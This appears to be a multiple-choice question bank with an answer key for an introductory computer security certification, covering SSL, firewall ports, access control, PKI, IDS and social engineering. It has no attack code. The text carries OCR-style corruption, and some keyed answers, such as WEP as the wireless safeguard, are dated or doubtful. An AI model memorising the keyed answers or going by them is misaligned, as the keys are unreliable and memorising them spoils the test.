B#Compsec Q195. What is the main advantage SSL (Secure Sockets Layer) has over HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer)? 	^A. SSL (Secure Sockets Layer) offers full application security for HTTP (Hypertext Transfer Protocol) while HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer) does not. 	^B. SSL (Secure Sockets Layer) supports additional application layer protocols such as FTP (File Transfer Protocol) and NNTP (Network News Transport Protocol) while HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer) does not. 	^C. SSL (Secure Sockets Layer) and Https (Hypertext Transfer Protocol over Secure Sockets Layer) are transparent to the application. 	^D. SSL (Secure Sockets Layer) supports user authentication and HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer) does not. 
A#Compsec Q196. A sound security policy will define: 	^A. what is considered an organizations assets. 	^B. what attacks are planned against the organization. 	^C. how an organization compares to others in security audits. 	^D. weaknesses in competitors systems. 
A#Compsec Q197. An IDS (Intrusion Detection System) is sending alerts that attacks are occurring which are not actually taking place. What is the IDS (Intrusion Detection System) registering? 	^A. false positives. 	^B. false negatives. 	^C. true negatives. 	^D. true positives. 
C#Compsec Q198. When an employee is dismissed, the security administrator should: 	^A. allow the employee to backup computer files then disable network access. 	^B. change all network passwords. 	^C. disable the employees network access. 	^D. set rules to forward the employees e-mail to a home address. 
B#Compsec Q199. How are honey pots used to collect information? Honey pots collect: 	^A. IP (Internet Protocol) addresses and identity of internal users. 	^B. data on the identity, access, and compromise methods used by the intruder. 	^C. data regarding and the identity of servers within the network. 	^D. IP (Internet Protocol) addresses and data of firewalls used within the network. 
D#Compsec Q200. How must a firewall be configured to only allow employees within the company to download files from a FTP (File Transfer Protocol) server? 	^A. open port 119 to all inbound connections. 	^B. open port 119 to all outbound connections. 	^C. open port 20/21 to all inbound connections. 	^D. open port 20/21 to all outbound connections. 
C#Compsec Q201. Administrators currently use telnet to remotely manage several servers. ^  Security policy dictates that passwords and administrative activities must not be communicated in clear text. Which of the following is the best alterative to using telnet? 	^A. DES (Data Encryption Standard).	^B. S-Telnet. 	^C. SSH (Secure Shell). 	^D. PKI (Public Key Infrastructure). 
D#Compsec Q202. An acceptable use policy signed by an employee can be interpreted as an employees written______ for allowing an employer to search an employees workstation. 	^A. refusal. 	^B. policy. 	^C. guideline. 	^D. consent. 
B#Compsec Q203. What protocol can be used to create a VPN (Virtual Private Network)? 	^A. PPP (Point-to-Point Protocol). 	^B. PPTP (Point-to-Point Tunneling Protocol). 	^C. SLIP (Serial Line Internet Protocol). 	^D. ESLIP (Encrypted Serial Line Internet Protocol). 
C#Compsec Q204. An attack whereby two different messages using the same hash function produce a common message digest is also known as a: 	^A. man in the middle attack. 	^B. cipher text only attack. 	^C. birthday attack. 	^D. brute force attack. 
D#Compsec Q205. In a RBAC (Role Based Access Control) contexts, which statement best describes the relation between users, roles and operations? 	^A. multiple users, single role and single operation. 	^B. multiple users, single role and multiple operations. 	^C. single user, single role and single operation. 	^D. multiple users, multiple roles and multiple operations. 
C#Compsec Q207. A user who has accessed an information system with a valid user ID and password combination is considered a (n): 	^A. manager 	^B. user 	^C. authenticated user 	^D. security officer 
D#Compsec Q208. The use of embedded root certificates within web browsers is an example of which of the following trust models? 	^A. bridge. 	^B. mesh. 	^C. hierarchy.	^D. trust list. 
D#Compsec Q209. A security consideration that is introduced by a VPN (Virtual Private Network) is: 	^A. an intruder can intercept VPN (Virtual Private Network) traffic and create a man in the middle attack. 	^B. captured data is easily decrypted because there are a finite number of encryption keys. 	^C. tunneled data CAN NOT be authenticated, authorized or accounted for. 	^D. a firewall CAN NOT inspect encrypted traffic. 
B#Compsec Q210. Which of the following would NOT be considered a method for managing the administration of accessibility? 	^A. DAC (Discretionary Access Control) list. 	^B. SAC (Subjective Access Control) list. 	^C. MAC (Mandatory Access Control) list. 	^D. RBAC (Role Based Access Control) list. 
A#Compsec Q211. Which of the following is required to use S/MIME (Secure Multipurpose Internet Mail Extensions)? 	^A. digital certificate. 	^B. server side certificate. 	^C. SSL (Secure Sockets Layer) certificate. 	^D. public certificate. 
C#Compsec Q212. Non-repudiation is generally used to: 	^A. protect the system from transmitting various viruses, worms and Trojan horses to other computers on the same network. 	^B. protect the system from DoS (Denial of Service) attacks. 	^C. prevent the sender or the receiver from denying that the communication between them has occurred. 	^D. ensure the confidentiality and integrity of the communication. 
D#Compsec Q213. Which of the following hash functions generates a 160-bit output? 	^A. MD4 (Message Digest 4). 	^B. MD5 (Message Digest5). 	^C. UDES (Data Encryption Standard). 	^D. SHA-1 (Secure Hashing Algorithm 1). 
B#Compsec Q214. Why are unique user IDs critical in the review of audit trails? 	^A. They CAN NOT be easily altered. 	^B. They establish individual accountability. 	^C. They show which files were changed. 	^D. They trigger corrective controls. 
B#Compsec Q215. A police department has three types of employees: booking officers, investigators, and judges. Each group of employees is allowed different rights to files based on their need. ^  The judges do not need access to the fingerprint database, the investigators need read access and the booking officers need read/write access. The booking officer would need no access to warrants, while an investigator would need read access and a judge would need read/write access. This is an example of: 	^A. DAC (Discretionary Access Control) level access control.	^B. RBAC (Role Based Access Control) level access control. 	^C. MAC (Mandatory Access Control) level access control. 	^D. ACL (Access Control List) level access control. 	
C#Compsec Q216. Which of the following access control models introduces user security clearance and data classification? 	^A. RBAC (Role Based Access Control). 	^B. NDAC (Non-Discretionary Access Control). 	^C. MAC (Mandatory Access Control). 	^D. DAC (Discretionary Access Control). 
C#Compsec Q217. A wireless network with three access points, two of which are used as repeaters, exists at a company. What step should be taken to secure the wireless network? 	^A. Ensure that employees use complex passwords. 	^B. Ensure that employees are only using issued wireless cards in their systems. 	^C. Ensure that WEP (Wired Equivalent Privacy) is being used. 	^D. Ensure that everyone is using adhoc mode. 
D#Compsec Q218. Digital certificates can contain which of the following items: 	^A. the CAs (Certificate Authority) private key. 	^B. the certificate holders private key. 	^C. the certificates revocation information. 	^D. the certificates validity period. 
A#Compsec Q219. Which encryption key is used to verify a digital signature? 	^A. the signers public key. 	^B. the signers private key. 	^C. the recipient's public key. 	^D. the recipient's private key. 
B#Compsec Q220. NetBus and Back Orifice are each considered an example of a (n): 	^A. virus. 	^B. illicit server. 	^C. spoofing tool. 	^D. allowable server. 
B#Compsec Q221. The theft of network passwords without the use of software tools is an example of: 	^A. Trojan programs. 	^B. social engineering. 	^C. sniffing. 	^D. hacking. 
D#Compsec Q222. An alternate site configured with necessary system hardware, supporting infrastructure and an on site staff able to respond to an activation of a contingency plan 24 hours a day, 7 days a week is a: 	^A. cold site. 	^B. warm site. 	^C. mirrored site. 	^D. hot site. 
B#Compsec Q223. LDAP (Lightweight Directory Access Protocol) directories are arranged as: 	^A. linked lists. 	^B. trees. 	^C. stacks. 	^D. queues. 
B#Compsec Q224. Which of the following is the greatest problem associated with Instant Messaging? 	^A. widely deployed and difficult to control. 	^B. created without security in min^D. 	^C. easily spoofed. 	^D. created with file sharing enabled. 
C#Compsec Q225. Searching through trash is used by an attacker to acquire data such as network diagrams, IP (Internet Protocol) address lists and: 	^A. boot sectors. 	^B. process lists. 	^C. old passwords. 	^D. virtual memory. 
B#Compsec Q226. Discouraging employees from misusing company e-mail is best handled by: 	^A. enforcing ACL (Access Control List). 	^B. creating a network security policy. 	^C. implementing strong authentication. 	^D. encrypting company e-mail messages. 
B#Compsec Q227. The Diffie-Hellman algorithm allows: 	^A. access to digital certificate stores from s-certificate authority. 	^B. a secret key exchange over an insecure medium without any prior secrets. 	^C. authentication without the use of hashing algorithms. 	^D. multiple protocols to be used in key exchange negotiations. 
D#Compsec Q228. Which of the following type of attack CAN NOT be deterred solely through technical means? 	^A. dictionary. 	^B. man in the middle. 	^C. DoS (Denial of Service). 	^D. social engineering. 
D#Compsec Q229. How must a firewall be configured to make sure that a company can communicate with other companies using SMTP (Simple Mail Transfer Protocol) e-mail? 	^A. Open TCP (transmission Control Protocol) port 110 to all inbound and outbound connections. 	^B. Open UDP (User Datagram Protocol) port 110 to all inbound connections. 	^C. Open UUP (User Datagram Protocol) port 25 to all inbound connections. 	^D. Open TCP (Transmission Control Protocol) port 25 to all inbound and outbound connections. 
B#Compsec Q230. An organizations primary purpose in conducting risk analysis in dealing with computer security is: 	^A. to identify vulnerabilities to the computer systems within the organization. 	^B. to quantify the impact of potential threats in relation to the cost of lost business-functionality. ^C. to identify how much it will cost to implement countermeasures. ^D. to delegate responsibility. 
C#Compsec Q231. A user wants to send an e-mail and ensure that the message is not tampered with while in transit. Which feature of modern cryptographic systems will facilitate this? 	^A. confidentiality. 	^B. authentication. 	^C. integrity. 	^D. non-repudiation. 
A#Compsec Q232. WTLS (Wireless Transport Layer Security) provides security services between a mobile device and a: 	^A. WAP (Wireless Application Protocol) gateway. 	^B. web server. 	^C. wireless client. 	^D. wireless network interface card. 
A#Compsec Q233. What are three measures which aid in the prevention of a social engineering attack? 	^A. education, limit available information, and security policy. 	^B. education, firewalls, and security policy. 	^C. security policy, firewalls, and incident response. 	^D. security policy, system logging, and incident response. 
D#Compsec Q234. Which of the following would be most effective in preventing network traffic sniffing? 	^A. deploy an IDS (Intrusion Detection System). 	^B. disable promiscuous mode. 	^C. use hubs instead of routers. 	^D. use switches instead of hubs. 
A#Compsec Q235. What ports does FTP (File Transfer Protocol) use? 	^A. 20 and 21. 	^B. 25 and 110. 	^C. 80 and 443. 	^D. 161 and 162. 
C#Compsec Q236. An e-mail relay server is mainly used to: 	^A. block all spam, which allows the e-mail system to function more efficiently without the additional load of spam. 	^B. prevent viruses from entering the network. 	^C. defend the primary e-mail server and limit the effects of any attack. 	^D. eliminate e-mail vulnerabilities since all e-mail is passed through the relay first. 
C#Compsec Q237. What network mapping tool uses ICMP (Internet Control Message Protocol)? 	^A. port scanner. 	^B. map scanner. 	^C. ping scanner. 	^D. share scanner. 
C#Compsec Q238. Which two protocols are VPN (Virtual Private Network) tunneling protocols? 	^A. PPP (point-to-Point Protocol) and SliP (Serial Line Internet Protocol). 	^B. PPP (Point-Point-Protocol) and PPTP (Point-to-Point Tunneling Protocol). 	^C. L2TP (Layer Two Tunneling Protocol) and PPTP (Point-to-Point Tunneling Protocol). 	^D. SMTP (Simple Mail Transfer Protocol) and L2TP (Layer Two Tunneling Protocol). 
A#Compsec Q239. File encryption using symmetric cryptography satisfies what security requirement? 	^A. confidentiality. 	^B. access control. 	^C. data integrity. 	^D. authentication. 
A#Compsec Q240. An e-mail is received alerting the network administrator to the presence of a virus on the system if a specific executable file exists. What should be the first course of action? 	^A. Investigate the e-mail as a possible hoax with a reputable anti-virus vendor. 	^B. Immediately search for and delete the file if discovered. 	^C. Broadcast amessage to the entire organization to alert users to the presence of a virus. 	^D. Locate and download a patch to repair the file. 
A#Compsec Q241. Part of a fire protection plan for a computer room should include;	^A. procedures for an emergency shutdown of equipment. 	^B. a sprinkler system that exceeds local code requirements. 	^C. the exclusive use of non-flammable materials within the room. 	^D. fireproof doors that can be easily opened if an alarm is sounded. 
B#Compsec Q242. Which of the following is an HTTP (Hypertext Transfer Protocol) extension or mechanism used to retain connection data, user information, history of sites visited, and can be used by attackers for spoofing an on-line identity? 	^A. HTTPS (Hypertext Transfer Protocol over SSL). 	^B. cookies. 	^C. HTTP (Hypertext Transfer Protocol)/l.0 Caching. 	^D. vCard v3.0. 
D#Compsec Q243. ActiveX controls__________ to prove where they originated. 	^A. are encrypted. 	^B. are stored on the web server. 	^C. use SSL (Secure Sockets Layer). 	^D. are digitally signed. 
B#Compsec Q244. A virus that hides itself by intercepting disk access requests is: 	^A. multipartite. 	^B. stealth. 	^C. interceptor. 	^D. polymorphic. 
D#Compsec Q245. When a potential hacker looks through trash, the most useful items or information that might be found include all except: 	^A. an IP (Internet Protocol) address. 	^B. system configuration or network map. 	^C. old passwords. 	^D. system access requests. 
A#Compsec Q246. A user logs onto a workstation using a smart card containing a private key. The user is verified when the public key is successfully factored with the private key. What security service is being provided? 	^A. authentication. 	^B. confidentiality. 	^C. integuity. 	^D. non-repudiation. 
B#Compsec Q247. In cryptographic operations, digital signatures can be used for which of the following systems? 	^A. encryption. 	^B. asymmetric key. 	^C. symmetric and encryption. 	^D. public and decryption. 
D#Compsec Q248. Which of the following programs is able to distribute itself without using a host file? 	^A. virus. 	^B. Trojan horse. 	^C. logic bom^B. 	^D. worm. 
C#Compsec Q249. Malicious code is installed on a server that will e-mail system keystrokes stored in a text file to the author and delete system logs every five days or whenever a backup is performed. What type of program is this? 	^A. virus. 	^B. back door. 	^C. logic bomb. 	^D. worm. 
B#Compsec Q250. What is a common type of attack on web servers? 	^A. birthday. 	^B. buffer overflow. 	^C. spam. 	^D. brute force. 
D#Compsec Q251. Digital signatures can be used for which of the following? 	^A. availability. 	^B. encryption. 	^C. decryption. 	^D. non-repudiation. 
B#Compsec Q252. Malicious port scanning is a methed of attack to determine which of the following? 	^A. computer name 	^B. the fingerprint of the operating system 	^C. the physical cabling topology of a network 	^D. user IDs and passwords 
A#Compsec Q253. What should be done to secure a DHCP (Dynamic Host Configuration Protocol) service? 	^A. block ports 67 and 68 at the firewall. 	^B. block port 53 at the firewall. 	^C. block ports 25 and 26 at the firewall. 	^D. block port 110 at the flrewall. 
A#Compsec Q255. Which security method is in place when the administrator of a network enables access lists on the routers to disable all ports that are not used? 	^A. MAC (Mandatory Access Control). 	^B. DAC (fliscretionary Access Control).	^C. RBAC (Role Based Access Control). 	^D. SAC (Subjective Access Control). 
D#Compsec Q256. What is the first step before a wireless solution is implemented? 	^A. ensure adhoc mode is enabled on the access points. 	^B. ensure that all users have strong passwords. 	^C. purchase only Wi-Fi (Wireless Fidelity) equipment. 	^D. perform a thorough site survey. 
A#Compsec Q257. A system administrator discovers suspicious activity that might indicate a computer crime. The administrator should flrst: 	^A. refer to incident response plan. 	^B. change ownership of any related files to prevent tampering. 	^C. move any related programs and files to non-erasable media. 	^D. set the system time to ensure any logged information is accurate. 
B#Compsec Q258. The information that governs and associates users and groups to certain rights to use, read, write, modify, or execute objects on the system is called a(n): 	^A. public key ring. 	^B. ACL (Access Control List). 	^C. digital signature. 	^D. CRL (Certificate Revocation Lists). 
C#Compsec Q259. A perimeter router is configured with a restrictive ACL (Access Control List). ^  Which transport layer protocols and ports must be allowed in order to support L2TP (Layer Two Tunneling Protocol) and PPTP (Point-to-Point Tunneling Protocol) connections respectively, through the perimeter router? 	^A. TCP (rransmission Control Protocol) port 635 and UDP (User Dalagram Protocol) port 654 	^B. TCP (Fransmission Control Protocol) port 749 and UDP (User Datagram Protocol) port 781 	^C. UDP (User Datagram Protocol) port 1701 and TCP (transmission Control Protocol) port 1723 	^D. TCP (rransmission Control Protocol) port 1812 and UDP (User Datagram Protocol) port 1813 
A#Compsec Q260. Which of the following keys is contained in a digital certificate? 	^A. public key. 	^B. private key. 	^C. hashing key. 	^D. session key. 
C#Compsec Q261. Single servers are frequently the targets of attacks because they contain: 	^A. application launch scripts. 	^B. security policy settings. 	^C. credentials for many systems and users. 	^D. master encryption keys. 
B#Compsec Q262. An attacker manipulates what field of an IP (Internet Protocol) packet in an IP (Internet Protocol) spoofing attack? 	^A. version fiel^D. 	^B. source address fiel^D. 	^C. source port fiel^D. 	^D. destination address fiel^D. 
B#Compsec Q263. A VPN (Virtual Private Network) using IPSec (Internet Protocol Security) in the tunnel mode will provide encryption for the: 	^A. one time pad used in handshaking.	^B. payload and message header. 	^C. hashing algorithm and all e-mail messages. 	^D. message payload only. 
C#Compsec Q264. When implementing Kerberos authentication, which of the following factors must be accounted for? 	^A. Kerberos can be susceptible to man in the middle attacks to gain unauthorized access. 	^B. Kerberos tickets can be spoofed using replay attacks to network resources. 	^C. Kerberos requires a centrally managed database of all user and resource passwords. 	^D. Kerberos uses clear text passwords. 
A#Compsec Q265. Which of the following protocols is most similar to SSLv3 (Secure Sockets Layer version 3)?	^A. TLS (transport Layer Security). 	^B. MPLS (Multi-Protocol Label Switching). 	^C. SASL (Simple Authentication and Security Layer). 	^D. MLS (Multi-Layer Switching). 
B#Compsec Q266. How should a primary DNS (D)omain Name Service) server be configured to-provide the best security against DoS (Denial of Service) and hackers? 	^A. disable the DNS (Domain Name Service) cache function. 	^B. disable application services other than DNS (Domain Name Service). 	^C. disable the DNS (Domain Name Service) reverse lookup function. 	^D. allow only encrypted zone transfer to a secondary DNS (Domain Name Service) server. 
C#Compsec Q267. What type of security process will allow others to verify the originator of an e-mail message? 	^A. authentication. 	^B. integrity. 	^C. non-repudiation. 	^D. confidentiality. 
D#Compsec Q268. Which of the following statements is true about Network based IDS (Intrusion Detection System)? 	^A. Network based (Intrusion Detection System) are never passive devices that listen on a network wire-without interfering with the normal operation of a network. 	^B. Network based IDS (Intrusion Detection System) are usually passive devices that listen on a network wire while interfering with the normal operation of a network.	^C. Network based IDS (Intrusion Detection System) are usualy intrusive devices that listen on a network wire while interfering with the normal operation of a network. 	^D. Network based IDS (Intrusion Detection System) are usually passive devices that listen on a network wire without interfering with the normal operation of a network. 
A#Compsec Q269. What physical access control most adequately protects against physical piggybacking? 	^A. man trap. 	^B. security guar^D. 	^C. CCTV (Closed-Circuit Television). 	^D. biometrics. 
B#Compsec Q270. Management wants to track personnel who visit unauthorized web sites. What type of detection will this be? 	^A. abusive detection. 	^B. misuse detection. 	^C. anomaly detection. 	^D. site filtering. 
A#Compsec Q271. Which of the following best describes TCP/IP (Transmission Control Protocol/Internet Protocol) session hijacking? 	^A. The TCP/IP (Transmission Control Protocol/Internet Protocol) session state is altered in a way that intercepts legitimate packets and allows a third party host to insert acceptable packets. 	^B. The TCP/IP (Transmission Control Protocol/Internet Protocol) session state is altered allowing third party hosts to create new IP (Internet Protocol) addresses. 	^C. The TCP/IP (Transmission Control Protocol/Internet Protocol) session state remains unaltered allowing third party hosts to insert packets acting as the server. 	^D. The TCP/IP (Transmission Control Protocol/Internet Protocol) session state remains unaltered allowing third party hosts to insert packets acting as the client. 
A#Compsec Q272. What technical impact may occur due to the receipt of large quantifies of spam? 	^A. DoS (Denial of Service). 	^B. processor underutilization. 	^C. reduction in hard drive space requirements. 	^D. increased network throughput. 
D#Compsec Q273. A public key ___________ is a pervasive system whose services are implemented and delivered using public key technologies that include CAs (Certificate Authority), digital certificates, non-repudiation, and key history management. 	^A. cryptography scheme. 	^B. distribution authority. 	^C. exchange. 	^D. infrastructure. 
B#Compsec Q274. Forging an IP (Internet Protocol) address to impersonate another machine is best defined as:	^A. TCP/IP (Transmission Control Protocol/Intemet Protocol) hijacking. 	^B. IP (Internet Protocol) spoofing. ^C. man in the middle. 	^D. replay. 
C#Compsec Q275. When setting password rules, which of the following would LOWER the level of security of a network? 	^A. Passwords must be greater than six characters and consist at least one non-alph^A. 	^B. All passwords are set to expire at regular intervals and users are required to choose new passwords that have not been used before. 	^C. Complex passwords that users CAN NOT remotely change are randomly generated by the administrator and given to users. 	^D. After a set number of failed attempts the server will lock out any user account forcing the user to call the administrator to re-enable the account. 
B#Compsec Q276. Which of the following can be used to track a users browsing habits on the Internet and may contain usernames and passwords? 	^A. digital certificates. 	^B. cookies. ^C. ActiveX controls. ^D. web server cache. 
B#Compsec Q277. FTP (Fi1e Transfer Protocol) is accessed through what ports? 	^A. 80 and 443. ^B. 20 and 21. ^C. 21 and 23. 	^D. 20 and 80. 
D#Compsec Q278. In a typical file encryption process, the asymmetric algorithm is used to? 	^A. encrypt symmetric keys. 	^B. encrypt file contents. 	^C. encrypt certiflcates. 	^D. encrypt hash results. 
C#Compsec Q279. During the digital signature process, hashing provides a means to verify what security requirement? 	^A. non-pudiation. 	^B. access control. 	^C. data integrity. 	^D. authentication. 
A#Compsec Q280. Which of the following often requires the most effort when securing a server due to lack of available documentation? 	^A. hardening the OS (Operating System) 	^B. configuring the network 	^C. creating a proper security policy 	^D. installing the latest hot fixes and patches 
B#Compsec Q281. As it relates to digital certificates, SSLv3.0 (Secure Sockets Layer version 3.0) added which of the following key functionalities? The ability to: 	^A. act as a CA (Certificate Authority). 	^B. force client side authentication via digital certificates. 	^C. use x.400 certificates. 	^D. protect transmissions with 1024-bit symmetric encryption. 
C#Compsec Q282. In responding to incidents such as security breaches, one of the most important steps taken is: 	^A. encryption. 	^B. authentication. 	^C. containment. 	^D. intrusion. 
D#Compsec Q283. SSL (Secure Sockets Layer) is used for secure communications with: 	^A. file and print servers. 	^B. RADIUS (Remote Authentication Dial-in User Service) servers. 	^C. AAA (Authentication, Authorization, and Administration) servers. 	^D. web servers. 
C#Compsec Q284. Non-repudiation is based on what type of key infrastructure? 	^A. symmetric.	^B. distributed trust. 	^C. asymmetric.	^D. user-centric.
C#Compsec Q285. The first step in effectively implementing a firewall is: 	^A. blocking unwanted incoming traffi^C. 	^B. blocking unwanted outgoing traffi^C. 	^C. developing a firewall policy. 	^D. protecting against DDoS (Distributed Denial of Service) attacks.
B#Compsec Q286. What is the best method to secure a web browser? 	^A. do not upgrade, as neW versions tend to have more security flaws. 	^B. disable any unused features of the web browser.	^C. connect to the Internet using only a VPN (Virtual Private Network) connection. 	^D. implement a filtering policy for illegal, unknown and undesirable sites. 
C#Compsec Q287. The most common form of authentication is the use of: 	^A. certificates. 	^B. tokens. 	^C. passwords. 	^D. biometrics. 
A#Compsec Q288. What are the three main components of a Kerberos server? 	^A. authentication server, security database, and a privilege server. 	^B. SAM (Sequential Access Method), security database, and an authentication server. 	^C. application database, security database, and system manager. 	^D. authentication server, security database, and system manager. 
A#Compsec Q289. Which of the following methods may be used to exploit the clear text nature of an instant-Messaging session? 	^A. packet sniffing. 	^B. port scanning. 	^C. crypt analysis. 	^D. reverse engineering. 
C#Compsec Q290. A user receives an e-mail from a colleague in another company. ^  The e-mail message warns of a virus that may have been accidentally sent in the pasts, and warns the user to delete a specific file if it appears on the users computer. ^  The user checks and has the file. What is the best next step for the user? 	^A. Delete the file immediately. 	^B. Delete the file immediately and copy the e-mail to all distribution lists. 	^C. Report the contents of the message to the network administrator. 	^D. Ignore the message. This is a virus hoax and no action is required. 
C#Compsec Q291. A CRL (Certificate Revocation List) query that receives a response in near real time: 	^A. indicates that high availability equipment is used. 	^B. implies that a fault tolerant database is being used. 	^C. does not guarantee that fresh data is being returned. 	^D. indicates that the CA (Certificate Authority) is providing near real time updates. 
C#Compsec Q292. Which of the following is a VPN (Virtual Private Network) tunneling protocol? 	^A. AH (Authentication Header). 	^B. SSH (Secure Shell). 	^C. IPSec (Internet Protocol Security). 	^D. DES (Data Encryption Standard). 
A#Compsec Q293. The Bell La-Padula access control model consists of four elements. These elements are 	^A. subjects, objects, access modes and security levels. 	^B. subjects, objects, roles and groups. 	^C. read only, read/write, write only and read/write/delete. 	^D. groups, roles, access modes and security levels. 
A#Compsec Q294. What is generally the most overlooked element of security management? 	^A. security awareness. 	^B. intrusion detection. 	^C. risk assessment. 	^D. vulnerability control. 
B#Compsec Q295. Which of the following needs to be included in a SLA (Service Level Agreement) to ensure the availability of server based resources rather than guaranteed server performance levels? 	^A. network 	^B. hosting 	^C. application 	^D. security 
A#Compsec Q296. When does CHAP (Challenge Handshake Authentication Protocol) perform the handshake process? 	^A. when establishing a connection and at anytime after the connection is established. 	^B. only when establishing a connection and disconnecting. 	^C. only when establishing a connection. 	^D. only when disconnecting. 
c#Compsec Q297. What should a firewall employ to ensure that each packet is part of an established TCP (Transmission Control Protocol) session? 	^A. packet filter. 	^B. stateless inspection. 	^C. stateful like inspection. 	^D. circuit level gateway. 
D#Compsec Q298. Which of the following is most commonly used by an intruder to gain unauthorized-access to a system? 	^A. brute force attack. 	^B. key logging. 	^C. Trojan horse. 	^D. social engineering. 
B#Compsec Q299. A minor configuration change which can help secure DNS (Domain Name Service) information is: 	^A. block all unnecessary traffic by using port filtering. 	^B. prevent unauthorized zone transfers. 	^C. require password changes every 30 days. 	^D. change the default password. 
A#Compsec Q300. What determines if a user is presented with a dialog box prior to downloading an Active X component? 	^A. the users browser setting. 	^B. the Script meta tag. 	^C. the condition of the sandbox. 	^D. the negotiation between the client and the server. 
A#Compsec Q301. LDAP (Lightweight Directory Access Protocol) requires what ports by default? 	^A. 389 and 636 	^B. 389and 139 	^C. 636 and 137 	^D. 137 and 139 
A#Compsec Q302. Which security method should be implemented to allow secure access to a web page, regardless of the browser type or vendor? 	^A. certificates with SSL (Secure Sockets Layer). 	^B. integrated web with NOS (Network Operating System) security. 	^C. SSL (Secure Sockets Layer) only. 	^D. secure access to a web page is not possible. 
A#Compsec Q303. What is a common DISADVANTAGE of employing an IDS (Intrusion Detection System)? 	^A. false positives. 	^B. throughput decreases. 	^C. compatibility. 	^D. administration. 
A#Compsec Q304. System administrators and hackers use what technique to review network traffic to determine what services are running? 	^A. sniffer. 	^B. IDS (Intrusion Detection System). 	^C. firewall. 	^D. router. 
B#Compsec Q305. Servers or workstations running programs and utilities for recording probes and attacks against them are referred to as: 	^A. firewalls. 	^B. host based IDS (Intrusion Detection System). 	^C. proxies. 	^D. active targets. 
B#Compsec Q306. To reduce vulnerabilities on a web server, an administrator should adopt which preventative measure? 	^A. use packet sniffing software on all inbound communications. 	^B. apply the most recent manufacturer updates and patches to the server. 	^C. enable auditing on the web server and periodically review the audit logs. 	^D. block all DNS (Domain Naming Service) requests coming into the server. 
A#Compsec Q307. What is the greatest advantage to using RADIUS (Remote Authentication Dial-in User Service) for a multi-site VPN (Virtual Private Network) supporting a large population of remote users? 	^A. RADIUS (Remote Authentication Dial-in User Service) provides for a centralized user database. 	^B. RADIUS (Remote Authentication Dial-in User Service) provides for a decentralized user database. 	^C. No user database is required with RADIUS (Remote Authentication Dial-in User Service). 	^D. User database is replicated and stored locally on all remote systems. 
C#Compsec Q308. Which of the following is the best protection against an intercepted password? 	^A. VPN (Virtual Private Network). 	^B. PPTP (Pointsto-Point Tunneling Protocol). 	^C. one time passwor^D. 	^D. complex password requirement. 
D#Compsec Q309. Which of the following statements most clearly outlines a major security vuInerability associated with Instant Messaging? 	^A. Instant Messaging does not support any form of message encryption. 	^B. Instant Messaging negatively impacts user productivity. 	^C. Instant Messaging uses TCP (rransmission Control Protocol) port 25 for message exchange. 	^D. Instant Messaging allows file attachments which could potentially contain viruses. 
B#Compsec Q310. Using distinct key pairs to separate confidentiality services from integrity services to support non-repudiation describes which one of the following models? 	^A. discrete key pair. 	^B. dual key pair. 	^C. key escrow. 	^D. foreign key. 
B#Compsec Q311. Which IETF (Internet Engineering Task Force) protocol uses AH (Authentication Header) and ESP (Encapsulating Security Payload) to provide security in a networked environment? 	^A. SSL (Secure Sockets Layer). 	^B. IPSec (Internet Protocol Security). 	^C. S-HTrP (Secure Hypertext Transfer Protocol). 	^D. SSH (Secure Shell). 
D#Compsec Q312. A honey pot is best described as 	^A. encryptor. 	^B. DMZ (Demilitarized Zone). 	^C. firewall. 	^D. decoy. 
D#Compsec Q313. Which of the following is typically included in a CRL (Certificate Revocation List)? 	^A. certificates that have had a limited validity period and have expired. 	^B. certificates that are pending renewal. 	^C. certificates that are considered invalid because they do not contain a valid CA (Certificate Authority) signature. 	^D. certificates that have been disabled before their scheduled expiration. 
C#Compsec Q314. A CPS (Certificate Practice Statement) is a legal document that describes a CAs (Certificate Authority): 	^A. class level issuing process. 	^B. copyright notice. 	^C. procedures. 	^D. asymmetric encryption schem^A. 
D#Compsec Q315. A severed T1 line is most likely to be considered in planning. 	^A. data recovery. 	^B. off site storage. 	^C. media destraction. 	^D. incident response. 
B#Compsec Q316. How are clocks used in a Kerberos authentication system? 	^A. The clocks are synchronized to ensure proper connections. 	^B. The clocks are synchronized to ensure tickets expire correctly. 	^C. The clocks are used to generate the seed value for the encryptions keys. 	^D. The clocks are used to benchmark and set the optimal encryption algorithm. 
B#Compsec Q317. An IT (Information Technology) security audit is generally focused on reviewing existing: 	^A. resources and goals 	^B. policies and procedures 	^C. mission statements 	^D. ethics codes 
D#Compsec Q318. Instant Messaging is most vulnerable to:	^A. DoS (Denial of Service). 	^B. fraud. 	^C. stability. 	^D. sniffing. 
D#Compsec Q319. What type of security mechanism can be applied to modems to better authenticate remote users? 	^A. firewalls 	^B. encryption 	^C. SSH (Secure Shell) 	^D. callback 
A#Compsec Q320. Despite regular system backups a significant risk still exists if: 	^A. recovery procedures are not tested 	^B. all users do not log off while the backup is made 	^C. backup media is moved to an off-site location 	^D. an administrator notices a failure during the backup process 
D#Compsec Q321. What are three characteristics of a computer virus? 	^A. find mechanism, initiation mechanism, and propagate 	^B. learning mechanism, contamination mechanism, and exploit 	^C. search mechanism, connection mechanism, and integrate 	^D. replication mechanism, activation mechanism, and objective 
B#Compsec Q322. Impersonating a dissatisfied customer of a company and requesting a password change on then customers account is a form of: 	^A. hostile code. 	^B. social engineering. 	^C. IP (Intemet Protocol) spoofing. 	^D. man in the middle attack. 
D#Compsec Q323. The basic strategy that should be used when configuring the rules for a secure firewall is: 	^A. permit all. 	^B. deny all. 	^C. default permit. 	^D. default deny . 
B#Compsec Q324. An employer gives an employee a laptop computer to use remotely. The user installs personal applications on the laptop and overwrites some system files. ^  How might this have been prevented with minimal impact on corporate productivity? 	^A. Users should not be given laptop computers in order to prevent this type of occurrence. 	^B. The user should have received instructions as to what is allowed to be installed. 	^C. The hard disk should have been made read-only	^D. Biometrics should have been used to authenticate the user before allowing software installation. 
c#Compsec Q325. A fundamental risk management assumption is, computers can NEVER be completely. 	^A. secure until all vendor patches are installed. 	^B. secure unless they have a variable passwor^D. 	^C. secure. 	^D. secure unless they have only one user. 
C#Compsec Q326. DDoS (Distributed Denial of Service) is most commonly accomplished by: 	^A. internal host computers simultaneously failing. 	^B. overwhelming and shutting down multiple services on a server. 	^C. multiple servers or routers monopolizing and over whelming the bandwidth of a particular server or router. 	^D. an individual e-mail address list being used to distribute a virus. 
